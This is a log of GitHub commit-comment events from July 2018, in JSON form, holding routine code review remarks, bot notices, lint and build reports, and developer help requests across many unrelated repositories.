{"id":"7998752736","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"kconrado/kkowalski_2nd_repository"},"payload":{"comment":{"id":29788896,"position":17,"line":17,"path":"src/test/java/com/crud/tasks/domain/MapperTestSuite.java","commit_id":"58f2367df3db2d9351a0dbddf6ef72c0045e107f","created_at":"2018-07-21T15:14:01Z","updated_at":"2018-07-21T15:14:01Z","author_association":"NONE","body":"TrelloMapper jest komponentem springowym więc możesz użyć @Autowired w całej klasie. Jeśli coś jest beanem, nigdy nie powinieneś używać konstruktora"}},"created_at":"2018-07-21T15:14:01Z"}
{"id":"7998753065","type":"CommitCommentEvent","actor":{"login":"ennui93"},"repo":{"name":"iputils/iputils"},"payload":{"comment":{"id":29788897,"position":null,"line":null,"path":null,"commit_id":"99f67db03d12b60f37b3af91f809f9f72bb1d29b","created_at":"2018-07-21T15:14:15Z","updated_at":"2018-07-21T15:14:15Z","author_association":"NONE","body":"This breaks compilation on systems where AI_CANONIDN is not defined in netdb.h (e.g. <glibc-2.3.4, alternative libcs that don't support IDN) when not using the system libidn2."}},"created_at":"2018-07-21T15:14:15Z"}
{"id":"7998753238","type":"CommitCommentEvent","actor":{"login":"vincent3569"},"repo":{"name":"zenphoto/zenphoto"},"payload":{"comment":{"id":29788898,"position":null,"line":null,"path":null,"commit_id":"88b0bcedce7d2f37a0b72d9eef57063478680530","created_at":"2018-07-21T15:14:22Z","updated_at":"2018-07-21T15:14:22Z","author_association":"COLLABORATOR","body":"hi\r\nnow Server protocol value \"https\" is stored.\r\nbut unfortunatly, nothing changes during setup process.\r\n\r\nIf I use my http url, (and Server protocol \"http\" is used) everything is OK and I have no error.\r\nBut if I uses my https url (whatever Server protocol value is used), I have a lot of errors:\r\n\r\n````\r\n{21581:Sat, 21 Jul 2018 15:13:40 GMT} Zenphoto v1.5\r\nEXCEPTION (0): Call to a member function query() on boolean in .../zenphoto__test/zp-core/functions-db-MySQLi.php on line 73 \r\n````"}},"created_at":"2018-07-21T15:14:22Z"}
{"id":"7998753293","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone-react"},"payload":{"comment":{"id":29788899,"position":null,"line":null,"path":null,"commit_id":"6621fd6afafd98d547449d6f018f2f6be6a8f4db","created_at":"2018-07-21T15:14:25Z","updated_at":"2018-07-21T15:14:25Z","author_association":"NONE","body":"Rob Gietema your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-21T15:14:25Z"}
{"id":"7998754480","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/guillotina"},"payload":{"comment":{"id":29788903,"position":null,"line":null,"path":null,"commit_id":"088ff4abd7f59fd6fea1ce39d1be82bc12fd6903","created_at":"2018-07-21T15:15:14Z","updated_at":"2018-07-21T15:15:14Z","author_association":"NONE","body":"@WnP you need to sign the Plone Contributor Agreement in order to merge this pull request. \n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html"}},"created_at":"2018-07-21T15:15:14Z"}
{"id":"7998754568","type":"CommitCommentEvent","actor":{"login":"MatisiekPL"},"repo":{"name":"MatisiekPL/bad-eslint-example"},"payload":{"comment":{"id":29788905,"position":3,"line":3,"path":"src/test1.js","commit_id":"5e5c844af9c5bd99b6e9374693472b21deabaf51","created_at":"2018-07-21T15:15:17Z","updated_at":"2018-07-21T15:15:17Z","author_association":"OWNER","body":"test. eerrros!"}},"created_at":"2018-07-21T15:15:17Z"}
{"id":"7998757298","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29788908,"position":null,"line":null,"path":null,"commit_id":"6c7ed6275f99993ec6747973763eae8702b07ca7","created_at":"2018-07-21T15:17:15Z","updated_at":"2018-07-21T15:17:15Z","author_association":"OWNER","body":"You're right in all respects. I will change accordingly in the next attempt.\r\n\r\nDo you have any clue why I have crashes every 1000 games or so?"}},"created_at":"2018-07-21T15:17:15Z"}
{"id":"7998757586","type":"CommitCommentEvent","actor":{"login":"Ch4rg3r"},"repo":{"name":"jeremyVignelles/libvlcsharp"},"payload":{"comment":{"id":29788909,"position":null,"line":null,"path":null,"commit_id":"fe3252a6e4db2fdaad2a3e90aca24430ef3417cc","created_at":"2018-07-21T15:17:28Z","updated_at":"2018-07-21T15:17:28Z","author_association":"NONE","body":"I did a fast test using HBox with VideoView and a label as Childs, it works perfectly. So `LibVLCSharp.Platforms.Gtk.VideoView` is a great implementation. I like, that the native controls  (WPF and this) work as normal controls.\r\n\r\nNo i don't have a mac :D "}},"created_at":"2018-07-21T15:17:28Z"}
{"id":"7998758511","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788911,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T15:18:12Z","updated_at":"2018-07-21T15:18:12Z","author_association":"OWNER","body":"Detekt report\n `- MagicNumber - [num] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7\n\n- MagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5\n\n`"}},"created_at":"2018-07-21T15:18:12Z"}
{"id":"7998760206","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29788914,"position":8,"line":38,"path":"src/main/kotlin/ml/duncte123/skybot/commands/music/PlayCommand.kt","commit_id":"88d507174d73812027a7dc402430655b602017d5","created_at":"2018-07-21T15:19:28Z","updated_at":"2018-07-21T15:19:28Z","author_association":"MEMBER","body":"Delet this"}},"created_at":"2018-07-21T15:19:28Z"}
{"id":"7998761101","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29788915,"position":null,"line":null,"path":null,"commit_id":"3f5d093f41efe239d88c1d10dc7ee248daa315a4","created_at":"2018-07-21T15:19:56Z","updated_at":"2018-07-21T15:19:56Z","author_association":"COLLABORATOR","body":"Puzzle `15-f9a60893` disappeared from [`src/main/java/io/zold/api/RtTransaction.java`](https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtTransaction.java), that's why I closed #25. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-21T15:19:56Z"}
{"id":"7998761569","type":"CommitCommentEvent","actor":{"login":"S-Tian86"},"repo":{"name":"S-Tian86/swot"},"payload":{"comment":{"id":29788916,"position":null,"line":null,"path":null,"commit_id":"7daa0e32ce2c3c388e3d504408f1415eca14c619","created_at":"2018-07-21T15:20:07Z","updated_at":"2018-07-21T15:20:07Z","author_association":"OWNER","body":"https://www.unab.cl #official web site\r\nhttps://www.unab.cl/vespertino/carreras/ingenieria-en-computacion-e-informatica/ #IT Carreer\r\nhttps://www.unab.cl/desarrolloestudiantil/servicios/conectividad/descarga-office-365/ #proof showing that the university recognizes the domain as an official email domain for the enrolled students."}},"created_at":"2018-07-21T15:20:07Z"}
{"id":"7998762163","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788919,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T15:20:31Z","updated_at":"2018-07-21T15:20:31Z","author_association":"OWNER","body":"Detekt report\n```\nMagicNumber - [num] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7\n\nMagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5\n\n```"}},"created_at":"2018-07-21T15:20:31Z"}
{"id":"7998762193","type":"CommitCommentEvent","actor":{"login":"Pentarctagon"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29788920,"position":null,"line":null,"path":null,"commit_id":"3290961db2eb00221c94f88f02f77ab640f497a4","created_at":"2018-07-21T15:20:32Z","updated_at":"2018-07-21T15:20:32Z","author_association":"MEMBER","body":"Looks like it isn't actually supported until GCC 4.9 ([lwn](https://lwn.net/Articles/584225/)), so I'll remove that option from 1.14.  1.15 is going to require GCC 5, or possibly a higher version, though(even if master still checks for 4.8+), so it will stay on master."}},"created_at":"2018-07-21T15:20:32Z"}
{"id":"7998763499","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29788926,"position":1,"line":null,"path":"1532186484.05/github_test.txt","commit_id":"2248cce3f03b301b4f3d3020413afa2d8e732a2c","created_at":"2018-07-21T15:21:26Z","updated_at":"2018-07-21T15:21:26Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-21T15:21:26Z"}
{"id":"7998763570","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788927,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T15:21:29Z","updated_at":"2018-07-21T15:21:29Z","author_association":"OWNER","body":"Detekt report:\n```\nMagicNumber - [num] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7\n\nMagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5\n\n```"}},"created_at":"2018-07-21T15:21:29Z"}
{"id":"7998764396","type":"CommitCommentEvent","actor":{"login":"abc1763613206"},"repo":{"name":"Himself65/Profile"},"payload":{"comment":{"id":29788929,"position":5,"line":27,"path":"index.html","commit_id":"20a7736d312d777cefd3a10361caac3c67b7b35f","created_at":"2018-07-21T15:22:05Z","updated_at":"2018-07-21T15:22:05Z","author_association":"NONE","body":"github可以保存修改记录啊......"}},"created_at":"2018-07-21T15:22:05Z"}
{"id":"7998764725","type":"CommitCommentEvent","actor":{"login":"imacubsfan23"},"repo":{"name":"imacubsfan23/plots2"},"payload":{"comment":{"id":29788931,"position":null,"line":null,"path":null,"commit_id":"d4e1cfd9d2602745a58a99d81bc6b045d786fac2","created_at":"2018-07-21T15:22:19Z","updated_at":"2018-07-21T15:22:19Z","author_association":"OWNER","body":"new commit at https://github.com/publiclab/plots2/pull/3095"}},"created_at":"2018-07-21T15:22:19Z"}
{"id":"7998774446","type":"CommitCommentEvent","actor":{"login":"jjm2473"},"repo":{"name":"openwrt/luci"},"payload":{"comment":{"id":29788947,"position":31,"line":21,"path":"applications/luci-app-shadowsocks-libev/luasrc/model/cbi/shadowsocks-libev.lua","commit_id":"966d87b79b1b4875f1a1c6f73d8a81a9a358afc4","created_at":"2018-07-21T15:29:26Z","updated_at":"2018-07-21T15:29:26Z","author_association":"NONE","body":"Why doesn't supporting host?"}},"created_at":"2018-07-21T15:29:26Z"}
{"id":"7998776354","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29788957,"position":8,"line":38,"path":"src/main/kotlin/ml/duncte123/skybot/commands/music/PlayCommand.kt","commit_id":"88d507174d73812027a7dc402430655b602017d5","created_at":"2018-07-21T15:30:44Z","updated_at":"2018-07-21T15:30:44Z","author_association":"MEMBER","body":"its just one."}},"created_at":"2018-07-21T15:30:44Z"}
{"id":"7998776501","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29788958,"position":null,"line":null,"path":null,"commit_id":"c94051a32260f43d5f70d87d514440a803bfd2b9","created_at":"2018-07-21T15:30:50Z","updated_at":"2018-07-21T15:30:50Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2985 of 2985 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c94051a32260f43d5f70d87d514440a803bfd2b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c94051a32260f43d5f70d87d514440a803bfd2b9-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-21T15:30:50Z"}
{"id":"7998776585","type":"CommitCommentEvent","actor":{"login":"acrylian"},"repo":{"name":"zenphoto/zenphoto"},"payload":{"comment":{"id":29788959,"position":null,"line":null,"path":null,"commit_id":"88b0bcedce7d2f37a0b72d9eef57063478680530","created_at":"2018-07-21T15:30:54Z","updated_at":"2018-07-21T15:30:54Z","author_association":"MEMBER","body":"The value actually was always stored because the option itself is never used, the value in the config file is.\r\n\r\nI will review the setup issue. Setup is a bit outside of everything so a lot things need to be literally doubled, probably something forgotten in that grown crowded code."}},"created_at":"2018-07-21T15:30:54Z"}
{"id":"7998776687","type":"CommitCommentEvent","actor":{"login":"Fightg"},"repo":{"name":"Fightg/LeeCooach.github.io"},"payload":{"comment":{"id":29788960,"position":18,"line":16,"path":"README.md","commit_id":"b8d938b75222b1c17be851ddd4d0f5e9df857321","created_at":"2018-07-21T15:30:59Z","updated_at":"2018-07-21T15:30:59Z","author_association":"OWNER","body":"苦"}},"created_at":"2018-07-21T15:30:59Z"}
{"id":"7998777749","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788963,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T15:31:43Z","updated_at":"2018-07-21T15:31:43Z","author_association":"OWNER","body":"## Detekt report:\n❌\n```\nMagicNumber - [num] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7\n\nMagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5\n\n```"}},"created_at":"2018-07-21T15:31:43Z"}
{"id":"7998780104","type":"CommitCommentEvent","actor":{"login":"akaihola"},"repo":{"name":"chadnetzer/hardlinkpy"},"payload":{"comment":{"id":29788966,"position":6,"line":117,"path":"hardlink.py","commit_id":"6c5a993b20f231613303a1a9727203ccde57cd1d","created_at":"2018-07-21T15:33:28Z","updated_at":"2018-07-21T15:33:28Z","author_association":"NONE","body":"`'%s' % value` implies `str(value)`, so the `str()` call is redundant here.\r\n\r\nSee Python documentation, under [`printf-style` String Formatting](https://docs.python.org/3/library/stdtypes.html#printf-style-string-formatting):\r\n\r\n> Conversion | Meaning | Notes\r\n> ---------- | ------- | -----\r\n> 's' | String (converts any Python object using [`str()`](https://docs.python.org/3/library/stdtypes.html#str)). | (5)\r\n"}},"created_at":"2018-07-21T15:33:28Z"}
{"id":"7998781344","type":"CommitCommentEvent","actor":{"login":"Etothepowerof26"},"repo":{"name":"Zeni44/underdone"},"payload":{"comment":{"id":29788969,"position":null,"line":null,"path":null,"commit_id":"70fb7aa0dbd10266c1fa372f485f1bc818f5eabc","created_at":"2018-07-21T15:34:20Z","updated_at":"2018-07-21T15:34:20Z","author_association":"COLLABORATOR","body":"I broke help menu :l"}},"created_at":"2018-07-21T15:34:20Z"}
{"id":"7998781582","type":"CommitCommentEvent","actor":{"login":"akhilnarang"},"repo":{"name":"AOSiP/platform_frameworks_base"},"payload":{"comment":{"id":29788970,"position":null,"line":null,"path":null,"commit_id":"9177951ff58f0fe5dedff520975f004c2413458a","created_at":"2018-07-21T15:34:30Z","updated_at":"2018-07-21T15:34:30Z","author_association":"CONTRIBUTOR","body":"Nope, I knew something in this set was the cause :P"}},"created_at":"2018-07-21T15:34:30Z"}
{"id":"7998781595","type":"CommitCommentEvent","actor":{"login":"pstevens71"},"repo":{"name":"recci/SuiteCRM"},"payload":{"comment":{"id":29788971,"position":null,"line":null,"path":null,"commit_id":"9b39345030cbb0db5cc68937786ed3f7bcdb284f","created_at":"2018-07-21T15:34:30Z","updated_at":"2018-07-21T15:34:30Z","author_association":"NONE","body":"This is still an issue in LTS 7.8.18. The fix proposed above so different from the current code in the this version. Can whomever proposed this fix update to current?"}},"created_at":"2018-07-21T15:34:30Z"}
{"id":"7998783831","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29788974,"position":null,"line":null,"path":null,"commit_id":"c94051a32260f43d5f70d87d514440a803bfd2b9","created_at":"2018-07-21T15:36:07Z","updated_at":"2018-07-21T15:36:07Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c94051a32260f43d5f70d87d514440a803bfd2b9-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-21T15:36:07Z"}
{"id":"7998787103","type":"CommitCommentEvent","actor":{"login":"doko123"},"repo":{"name":"joyzoursky/docker-python-chromedriver"},"payload":{"comment":{"id":29788977,"position":null,"line":null,"path":null,"commit_id":"aaf630f054ac602333fab292f939df73c11bc3eb","created_at":"2018-07-21T15:38:30Z","updated_at":"2018-07-21T15:38:30Z","author_association":"NONE","body":"Hi.\r\nI have updated my Dockefile with your commands for selenium and chromedriver installing, but my tests still fails, even I have attached your implementation of driver initialization.\r\n```\r\nE                       selenium.common.exceptions.WebDriverException: Message: 'chromedriver' executable needs to be in PATH. Please see https://sites.google.com/a/chromium.org/chromedriver/home\r\n\r\n/usr/local/lib/python3.6/site-packages/selenium/webdriver/common/service.py:83: WebDriverException\r\n```\r\nmy Dockerfile:\r\n```\r\n# Use an official Python runtime as a parent image\r\nFROM python:3.6-alpine3.7 as builder\r\n\r\nLABEL maintainer=\"Dominika Kowalczyk <dominika15kowalczyk@gmail.com>\"\r\n\r\n######################\r\n# Install Dependencies\r\n######################\r\n\r\nCOPY requirements.txt /req/\r\nRUN cd /req; pip install -r requirements.txt\r\n# update apk repo\r\nRUN echo \"http://dl-4.alpinelinux.org/alpine/v3.7/main\" >> /etc/apk/repositories && \\\r\n    echo \"http://dl-4.alpinelinux.org/alpine/v3.7/community\" >> /etc/apk/repositories\r\n\r\n# install chromedriver\r\nRUN apk update\r\nRUN apk add chromium chromium-chromedriver\r\n######################\r\n# Install Application\r\n######################\r\n\r\nFROM python:3.6-alpine3.7\r\nCOPY --from=builder /usr/local/ /usr/local/\r\nCOPY --from=builder /root/.cache /root/.cache\r\n\r\n# Copy the current directory contents into the container at /app\r\nCOPY app/ /app/\r\n\r\n# Make port 80 available to the world outside this container\r\nEXPOSE 80\r\n\r\n######################\r\n# Set Application Environment Variables\r\n######################\r\n\r\nENV PYTHONIOENCODING=utf-8 \\\r\n    PYTHONPATH=/app \\\r\n    FLASK_APP=app.py \\\r\n    DYNACONF_SETTINGS=config.settings\r\n\r\n# Set the working directory to /app\r\nWORKDIR /app\r\n\r\n######################\r\n# Run Application\r\n######################\r\n# Run app.py when the container launches\r\nCMD [\"/usr/local/bin/gunicorn\", \"app:application\", \"-b\", \"0.0.0.0:5000\", \"-t 10800\"]\r\n\r\n```\r\nan command I am running the tests:\r\n`docker-compose run --rm hotel_reviewer py.test /app/tests -s --ignore=tests/workflows/views -vv`\r\nCould you help me?"}},"created_at":"2018-07-21T15:38:30Z"}
{"id":"7998788057","type":"CommitCommentEvent","actor":{"login":"skygenetic"},"repo":{"name":"skygenetic/Node-Js-Master"},"payload":{"comment":{"id":29788979,"position":null,"line":null,"path":null,"commit_id":"6fc3b54e1d1e7a80084d4c0e6408eb771e07aebb","created_at":"2018-07-21T15:39:14Z","updated_at":"2018-07-21T15:39:14Z","author_association":"OWNER","body":"first commit"}},"created_at":"2018-07-21T15:39:14Z"}
{"id":"7998788232","type":"CommitCommentEvent","actor":{"login":"iamsj7"},"repo":{"name":"AOSP-Legacy-MSM8916/platform_manifest"},"payload":{"comment":{"id":29788980,"position":null,"line":null,"path":null,"commit_id":"7b7b8c4dd71edfc3e2dad86dc15fb67bf8bb3da1","created_at":"2018-07-21T15:39:22Z","updated_at":"2018-07-21T15:39:22Z","author_association":"MEMBER","body":"lmao"}},"created_at":"2018-07-21T15:39:22Z"}
{"id":"7998788446","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788982,"position":143,"line":143,"path":"src/main/java/com/github/cranite/MoreEnchantables/Enchantment/EnchantmentEvents.java","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T15:39:31Z","updated_at":"2018-07-21T15:39:31Z","author_association":"NONE","body":"That's fine :)"}},"created_at":"2018-07-21T15:39:31Z"}
{"id":"7998791767","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"AOSiP/platform_frameworks_base"},"payload":{"comment":{"id":29788983,"position":null,"line":null,"path":null,"commit_id":"9177951ff58f0fe5dedff520975f004c2413458a","created_at":"2018-07-21T15:41:46Z","updated_at":"2018-07-21T15:41:46Z","author_association":"CONTRIBUTOR","body":"Apps are restarting (sometimes just the activity) when I resume them from recents.\r\nAnd I noticed that alot of the commits I picked from AOSP master have been pushed by Harsh to this repo so maybe your issue is related to mine..."}},"created_at":"2018-07-21T15:41:46Z"}
{"id":"7998791827","type":"CommitCommentEvent","actor":{"login":"jwoertink"},"repo":{"name":"luckyframework/lucky"},"payload":{"comment":{"id":29788984,"position":null,"line":null,"path":null,"commit_id":"d7469583ead24da0653b28df7104e8547cecc577","created_at":"2018-07-21T15:41:48Z","updated_at":"2018-07-21T15:41:48Z","author_association":"CONTRIBUTOR","body":"I think this closes #538 not #539 ?"}},"created_at":"2018-07-21T15:41:48Z"}
{"id":"7998793112","type":"CommitCommentEvent","actor":{"login":"akaihola"},"repo":{"name":"chadnetzer/hardlinkpy"},"payload":{"comment":{"id":29788989,"position":21,"line":125,"path":"hardlink.py","commit_id":"6c5a993b20f231613303a1a9727203ccde57cd1d","created_at":"2018-07-21T15:42:42Z","updated_at":"2018-07-21T15:42:42Z","author_association":"NONE","body":"The parentheses are redundant here – `(options.notimestamp)` evaluates to just `options.notimestamp`. Since there is only one placeholder in the format string, passing just one value directly is possible:\r\n\r\n    print(\"Ignore date: %s\" % options.notimestamp)\r\n\r\nBy the way, it is still legal to provide the single value as a one-tuple:\r\n\r\n    print(\"Ignore date: %s\" % (options.notimestamp,))\r\n\r\nInterestingly, if we want to render a tuple as a string, it *must* be wrapped in another tuple:\r\n\r\n    >>> '%s' % ('foo', 'bar')\r\n    TypeError: not all arguments converted during string formatting\r\n    >>>  '%s' % (('foo', 'bar'),)\r\n    \"('foo', 'bar')\""}},"created_at":"2018-07-21T15:42:42Z"}
{"id":"7998798733","type":"CommitCommentEvent","actor":{"login":"hemcodemode"},"repo":{"name":"heroku/django-heroku"},"payload":{"comment":{"id":29789001,"position":null,"line":null,"path":null,"commit_id":"1ed16ab6dff15ab4abe40ae9ae8216695d669c5e","created_at":"2018-07-21T15:46:37Z","updated_at":"2018-07-21T15:46:37Z","author_association":"NONE","body":"SyntaxError: invalid syntax due to * as params in settings function for python2.7 windows machine"}},"created_at":"2018-07-21T15:46:37Z"}
{"id":"7998799197","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29789002,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T15:46:57Z","updated_at":"2018-07-21T15:46:57Z","author_association":"OWNER","body":"- hi \n - bbbbb"}},"created_at":"2018-07-21T15:46:57Z"}
{"id":"7998801113","type":"CommitCommentEvent","actor":{"login":"charris"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29789004,"position":null,"line":null,"path":null,"commit_id":"3d0da6b6acac050e67509ed6a469dba1602b1890","created_at":"2018-07-21T15:48:19Z","updated_at":"2018-07-21T15:48:19Z","author_association":"CONTRIBUTOR","body":"Mac build passed, the double upload is still there. Did you test that after fixing or is that result from before the fix?"}},"created_at":"2018-07-21T15:48:19Z"}
{"id":"7998802283","type":"CommitCommentEvent","actor":{"login":"MaryKay05"},"repo":{"name":"MaryKay05/Hello-World"},"payload":{"comment":{"id":29789005,"position":null,"line":null,"path":null,"commit_id":"3fb670451375014607024838fc1eca7b4bfbf213","created_at":"2018-07-21T15:49:07Z","updated_at":"2018-07-21T15:49:07Z","author_association":"OWNER","body":"hi my name is Mary and this is my first ever doc in GitHub"}},"created_at":"2018-07-21T15:49:07Z"}
{"id":"7998803304","type":"CommitCommentEvent","actor":{"login":"MaryKay05"},"repo":{"name":"MaryKay05/Hello-World"},"payload":{"comment":{"id":29789007,"position":null,"line":null,"path":null,"commit_id":"3fb670451375014607024838fc1eca7b4bfbf213","created_at":"2018-07-21T15:49:53Z","updated_at":"2018-07-21T15:49:53Z","author_association":"OWNER","body":"comments"}},"created_at":"2018-07-21T15:49:53Z"}
{"id":"7998804803","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29789008,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T15:50:57Z","updated_at":"2018-07-21T15:50:57Z","author_association":"OWNER","body":"## Detekt report:\n❌\n```\nMagicNumber - [num] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7\n\nMagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5\n\n```"}},"created_at":"2018-07-21T15:50:57Z"}
{"id":"7998805369","type":"CommitCommentEvent","actor":{"login":"pstevens71"},"repo":{"name":"shogunpol/SuiteCRM"},"payload":{"comment":{"id":29789009,"position":null,"line":null,"path":null,"commit_id":"f8b4fabb3bda6e12e28fe084c8402e8b0449ff8f","created_at":"2018-07-21T15:51:22Z","updated_at":"2018-07-21T15:51:22Z","author_association":"NONE","body":"This fix needs a couple of tweaks to work with current version as code has changed, but it does work on 7.8.18 LTS. Just needs a couple of extra brackets. Thanks!"}},"created_at":"2018-07-21T15:51:22Z"}
{"id":"7998805924","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29789010,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T15:51:46Z","updated_at":"2018-07-21T15:51:46Z","author_association":"OWNER","body":"## Detekt report:\n❌\n```\nMagicNumber - [num] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:13:21 - Signature=MainActivity.kt$MainActivity$7\n\nMagicNumber - [<anonymous>] at /Users/tarek/AndroidStudioProjects/emptyapp/app/src/main/kotlin/com/example/empty/emptyapp/MainActivity.kt:22:22 - Signature=MainActivity.kt$MainActivity$5\n\n```"}},"created_at":"2018-07-21T15:51:46Z"}
{"id":"7998806244","type":"CommitCommentEvent","actor":{"login":"pstevens71"},"repo":{"name":"shogunpol/SuiteCRM"},"payload":{"comment":{"id":29789011,"position":null,"line":null,"path":null,"commit_id":"f8b4fabb3bda6e12e28fe084c8402e8b0449ff8f","created_at":"2018-07-21T15:52:00Z","updated_at":"2018-07-21T15:52:00Z","author_association":"NONE","body":"` }else{\r\n\t\t\t\t\t\t\r\n                        $t = getModuleField($att['module'], $att['field'], $att['field'], 'DetailView',$row[$name],'',$currency_id);\r\n                    if (preg_match('/checkbox/',$t)) {\r\n                        $csv .= $row[$name];\r\n\r\n\t\t\t\t\t} else {\r\n                        $csv .= $this->encloseForCSV(trim(strip_tags(getModuleField($att['module'], $att['field'],\r\n                            $att['field'], 'DetailView', $row[$name], '', $currency_id))));\r\n                    }\r\n\t\t\t\t\t}\r\n                    $csv .= $delimiter;\r\n                }`"}},"created_at":"2018-07-21T15:52:00Z"}
